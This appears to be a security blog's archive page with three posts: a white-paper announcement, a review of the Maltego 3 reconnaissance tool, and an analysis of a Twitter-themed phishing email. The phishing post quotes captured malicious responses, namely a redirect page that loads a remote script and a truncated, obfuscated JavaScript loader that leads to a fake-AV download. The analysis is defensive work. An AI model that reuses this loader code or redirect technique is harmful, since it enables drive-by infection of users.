Tag Archives: twitter

Two New Social Media Security White Papers Released

Filed under Social Networks
Tagged as , , , , , , , , , ,

My employer (SecureState) has released two white papers as part of our Social Media Security Awareness Month.  You can also download some cool wallpaper for this month created by Rob our graphic designer (see the picture on the right).  🙂

First is some research several of my colleagues and I worked on.  The paper is titled: “Profiling User Passwords on Social Networks”.  The paper discusses the password problem that we all know and love as well as how you can determine passwords by what individuals post on their profiles.  We dive into tools from Robin Wood, Mark Baggett and others that can be used to pull keywords from profiles and other sources to create wordlists.  These wordlists can be used for brute force attacks on user accounts.  Next, we look at password complexity of several popular social networks with some research around brute force controls that some of the social networks have implemented, or in some cases haven’t.  Lastly, we discuss some things that users of social networks can do when choosing passwords.  You can download my paper here.

The other paper released is titled: “Security Gaps in Social Media Websites for Children Open Door to Attackers Aiming To Prey On Children” by my colleague Scott White.  In his paper he looks at the security of social media websites specifically designed for children.  This is some very detailed research and sheds some light on how predators are using these sites to target children as well as some issues that are unique to these types of social media websites.  You can download Scott’s paper here.

Speaking of social media…I’ll be presenting “Social Impact: Risks and Rewards of Social Media” at the Information Security Summit this Friday at 10am.  I’ll have the slide deck posted shortly after the conference.

Overview and Review of Maltego 3

Filed under Penetration Testing
Tagged as , , , ,

A few weeks ago the fine folks over at Paterva released the next version of their information gathering tool, Maltego 3.  Ever since day one of the product I’ve been a huge fan and have used it in multiple penetration tests and various reconnaissance activities.  I know I’m not alone as many of you in the security community use Maltego and also see the value that it brings.  Maltego 3 is no different.  However: it’s faster, more feature rich and has a damn sexy UI.  I won’t go into a ton of detail in this post but I want to highlight some of the awesome changes that I’ve noticed.

Setup and UI
The first thing you will notice is the startup wizard (Figure 1) that walks you though setting up your license and updating the TAS to download new transforms.  The wizard is a welcome addition especially for new users.

Figure 1. The Maltego 3 startup wizard.

You will notice that the transform manager itself has also gotten a face lift with a column showing you if a disclaimer is required or not (Figure 2).

Figure 2. The transform manager now shows you which transforms have a disclaimer or not.

Another noticeable change is the UI.  It’s sleek and sexy.  I also like how the main menu is grouped into two tabs: Investigate and Manage (Figures 3 and 4).  The Paterva team did a great job grouping items so its easy to select what you need.

Figure 3. Menu items are grouped into two tabs now.  Items are much easier to select.  This is the “Manage” tab.

Figure 4. The “Investigate” tab.

Back to the main UI.  Adding objects is similar to before but it’s faster and more responsive.  Figure 5 is a screen shot of the entire UI.

Figure 5. Simple Twitter search using the new Maltego 3 UI.

Entities connected to each other are easier to view.  When arrows connect to entities they move around other objects. (Figure 6).

Figure 6. Maltego 3 offers some nice UI improvements when moving entities around the screen.

Site Links and Entity Listings
Two other items I want to mention are some improvements on how links to and from a site are shown and the entity listing feature.  The site links transform rocks.  You can now see incoming and outgoing links to a website entity.

Figure 7. Links in and out of a website are easy to obtain in Maltego 3.

Lastly, I found the entity listing view most helpful.  This allows you to search and sort all the entities in your Maltego UI into a nice easy to view list (Figure 8).  Also, the dynamic view is pretty sweet as well.

Figure 8.  The entity list view provides a great way to search for things within the UI.

You can get the commercial version of Maltego now and the Community Edition is right around the corner.  Version 2 users can also use your same license key with Maltego 3.  Win!  Also, if your hesitant about buying a commercial product like this, don’t be.  Maltego is quite affordable for all the power you get and well worth it.  Reconnaissance is fun again! 🙂  More information about Maltego 3 is here.

Interesting New Twitter Phish Can Lead to Bad Places

Filed under Malware, Social Networks
Tagged as , , , ,

I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and I which is totally possible. 🙂 Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>

</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/[‘ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://, it 404’s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:


This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.